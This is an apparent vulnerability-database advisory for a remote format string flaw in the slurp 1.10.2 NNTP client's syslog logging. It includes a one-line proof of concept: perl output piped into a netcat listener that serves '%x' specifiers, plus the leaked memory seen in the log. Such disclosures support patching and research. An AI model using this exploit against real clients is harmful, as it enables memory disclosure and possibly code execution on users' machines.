Slurp 1.10.2 - SysLog Remote Format String

2020.07.31

Milad Karimi (IR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Slurp 1.10.2 - SysLog Remote Format String 
# Date: 2020-07-27
# Author: Milad Karimi

slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.

It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.

perl -e 'print "BY BY BY \n666 %x%x%x\n'" | nc -l -p 112

Then check /var/log/messages for something like:

slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Slurp 1.10.2 - SysLog Remote Format String

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.